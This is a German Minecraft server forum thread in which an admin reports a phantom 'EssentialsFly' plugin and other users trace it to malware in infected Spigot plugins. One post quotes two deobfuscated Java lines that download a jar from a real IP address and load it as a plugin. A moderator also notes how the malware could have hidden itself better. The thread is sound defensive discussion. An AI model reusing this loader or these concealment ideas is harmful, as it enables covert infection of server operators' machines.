• Bitte beachte, dass wir eine Serverliste sind!
    Wenn du ein Problem auf einem Server hast (z.B. Entbannantrag, etc), dann ist das Forum hier der falsche Ort.
  • Es freut uns dass du in unser Minecraft Forum gefunden hast. Hier kannst du mit über 130.000 Minecraft Fans über Minecraft diskutieren, Fragen stellen und anderen helfen. In diesem Minecraft Forum kannst du auch nach Teammitgliedern, Administratoren, Moderatoren , Supporter oder Sponsoren suchen. Gerne kannst du im Offtopic Bereich unseres Minecraft Forums auch über nicht Minecraft spezifische Themen reden. Wir hoffen dir gefällt es in unserem Minecraft Forum!

Was ist Enabling EssentialsFly v1.6.4 ??

Starnos

Kuhfänger
Diamanten
238
Hallo liebe User/innen,

ich habe auf meinen Server ein Plugin womit man Fahrzeuge ohne Mod´s haben kann evtl kennt das ja einer ? Das Vehicle plugin.

Bis jetzt lief alles 1a aber seit heute hab ich ein mächtiges Problem. Die Fahrzeuge lassen sich nicht mehr lenken. Die seteuern nur noch im Kreis.
Es wurde nix verändert am Server und auch keine Plugins aktualisiert.

Also habe ich ausschluss Verfahren gemacht.
Erst alle weg und dann nur das Plugin selbst drauf gelassen. Da funzt es alles 1a ohne Probleme... nun mach ich ein Plugin mit drauf egal welches das spielt keine Rolle und es funktioniert nicht mehr.....das komische ist in der konsole wird dann noch ein Plugin mit installiert: Enabling EssentialsFly v1.6.4. Dieses wird auch unter /pl angezeigt aber es wurde nicht mit drauf installiert...auch im Plugin Ordner ist es nicht zu finden.

Also hatte ich den Testserver ganz frisch gemacht Ohne ein einziges Plugin. Da kommt wieder das EssentialsFly v1.6.4.
Hat einer auch schonmal so ein Problem gehabt?

Oder hat MC wieder an der Spielmechanik gefummelt??

Zuletzt bearbeitet:

UnityGaming

Workaholic
Diamanten
312
Minecraft
FastFelix771
thousands of events, but the event names are hashed/obfuscated
Das konnte ich im Code auch beobachten. Da ist ne Menge los.

Vielleicht sollten wir da nochmal in den Code schauen.
Ist das ein Paid plugin bzw. liegt irgendwo der Source Code offen?

Irgendein Plugin muss den Schädling ja mitliefern.

Ich hab mich in die Diskussion bei Spigot mal eingeklinkt.

Zuletzt bearbeitet:

UnityGaming

Workaholic
Diamanten
312
Minecraft
FastFelix771
Hier finden sich auch nun kleinere Infos dazu, was alles gesendet wird und wohin:
https://www.spigotmc.org/threads/alert-mc-security-threat-adwind-malware.321597/

Die Auflistung beinhaltet unter anderem Quellen zum "Hersteller".

Hier sogar mehrere Videologs von der Produktion:
https://www.youtube.com/channel/UCOFbtJGP7j6k7MSGBzhIZLA/videos

Da kommt bei mir langsam die Frage auf, wie die Nutzer das übersehen konnten so lange? Es geschah ja scheinbar gar nicht so heimlich... sondern direkt vor ihrer Nase. o_O

Chrisliebär❤️

nur echt mit ❤️
Moderator
Diamanten
830
Da kommt bei mir langsam die Frage auf, wie die Nutzer das übersehen konnten so lange? Es geschah ja scheinbar gar nicht so heimlich... sondern direkt vor ihrer Nase. o_O
Die Antwort ist ja wohl offensichtlich. Erstmal haben die meisten Nutzer von Spigot keine Ahnung. Das Wissen um so ein Plugin überhaupt zu erkennen dürfte den meisten Fehlen. Aber lass die Frage doch umdrehen? Was muss ich tun, damit ich das Plugin erkenne? Da gibt es ja mehrere Möglichkeiten:

Virenscanner: Klingt vielleicht erstmal am einfachsten. Problem ist, dass Virenscanner einfach nutzlos sind. Lässt sich sogar mathematisch Beweisen, dass ein Virenscanner niemals jeden Virus erkennen kann. Abgesehen von einer festen Signaturdatenbank bringt dir auch die Verhaltensanalyse nix. Das Plugin arbeitet komplett im Serverprozess, absolut unverdächtig und kein Virenscanner ist überhaupt in der Lage Java Bytecode zu verstehen. Das einzige Verdächtige ist die Bytecode Patcher Library und worran genau soll die erkannt werden? Ist ja Obfuscated.

Serverlogs: Tja. Das wird auch nix. Da wir hier vor allem von Hobbyentwicklern reden, haben die meisten keine Ahnung wie man Logging in großen Anwendungen macht. Wieviele Plugins kennst du, die verschiedene Loglevels erlauben? Spigot nutzt sogar ein Loggingframework womit man zentrale Loglevels einstellen könnte, aber da niemand damit umgehen kann, wird's nicht benutzt. Ansonsten wäre das Plugin überhaupt nicht aufgefallen, wenn es sich nicht selbst als Plugin angemeldet hätte. Es wäre viel sinnvoller gewesen sich in ein Plugin reinzupatchen und einfach die onEnable Methode für die Initialisierung zu übernehmen. Oder die Loggingausgabe sowie die Pluginliste abzufangen und zu filtern.

Netzwerkverkehr: Da es scheinbar vollkommen akzeptabel ist, dass jedes Plugin Spyware in Form von Metriks mitbringt und auch andere Daten hat sein Zuhause schickt, braucht man sich nicht wundern, wenn niemand bock hat sich durch zehn Verbindungen zu kämpfen, die alle bei irgendwelchen AWS Instanzen laden. Solange diese Praxis akzeptiert wird, wird sie fortgesetzt.

CPU Auslastung: lol. So scheiße wie Minecraft programmiert wurde kann sich dein Server sogar ohne Plugins komplett zerschießen. Dafür braucht es überhaupt keinen Schadecode.

Plugins laufen mit Userrechten und sind ein gewaltiges Sicherheitsproblem. Aus diesem Grund gibt es in der Windows 10 Version auch keine Plugins mehr. Das ist einfach extrem gefährlich und muss gut isoliert werden. Mit Java ist das zwar möglich, aber wie gut das funktioniert sieht man ja wenn man sich die Versionshistorie des Browserplugins ansieht. Eigentlich gehört da eine Skriptsprache wie Lua eingebaut, die sich einfacherer isolieren lässt. Damit kann man zwar vor allem mit Zeugs wie den Meltdown und Spectre Angriffen noch immer auf den Arbeitsspeicher zugreifen, aber zumindest sind die Prozesse dann erstmal isoliert und der Angriff deutlich komplizierter gemacht.

Und ganz am Schluss steht das blinde Vertrauen in andere und Technik. Man hat selbst keine Ahnung wie die Technik funktioniert, was ein Virenscanner überhaupt leistet, was ein Mensch leisten kann, wenn er mal kurz in den Quellcode eines Plugins guckt. "Die bei Spigot gucken schon dass alles sicher ist". Du siehst ja selbst, wie oft hier im Forum Virustotal Link auftauchen, in dem glauben ein Virenscanner erkennt schon alles, oder zumindest fast alles. Selbst im Spigotforum ist wieder ein solcher Link (von dir?). Nichts davon erkennt er.

Edit: Nachdem ich den Spigot Thread überflogen hab, stelle ich wieder fest, wie blind der Glauben in Virenscanner ist. Als ob man einfach nur einen magischen Virenscanner baut und plötzlich erkennt der alle Viren und man muss sich um nichts mehr kümmern. Wenns so einfach wäre, dann gäbs das schon, schließlich gibt es eine ganze Industrie die damit Geld verdienen möchte.

Zuletzt bearbeitet:

UnityGaming

Workaholic
Diamanten
312
Minecraft
FastFelix771
Es gelang nun jemandem aus den Spigot Foren das gesamte Plugin zu deobfuscaten.
Hier sind die betroffenen Zeilen, mit denen der Schädling geladen wird: (Auszug aus "DailyLootbox")
Code:
FileUtils.copyURLToFile(new URL("http://31.214.243.114/fefegfregt.jar"), new File("plugins/PluginMetrics.jar"));
Bukkit.getPluginManager().enablePlugin(Bukkit.getPluginManager().loadPlugin(new File("plugins/PluginMetrics.jar")));

http://www.utrace.de/whois/31.214.243.114 führt zu "DeinServerHost" auf den ersten Blick.

Zuletzt bearbeitet:

UnityGaming

Workaholic
Diamanten
312
Minecraft
FastFelix771
was bewirkt der damit ???
Opfer sammeln.

Vielleicht trägt das letzten Endes sogar positiv zu Spigots Community bei.
Wenn man weiß, dass jemand aktiv Plugins infiziert und unter die Leute schmuggelt, geht man evtl. mit gesunder Skepsis an die Sache ran in Zukunft, anstatt blind irgendwelche fremde Software auf seine Kiste zu schmeißen.

Oben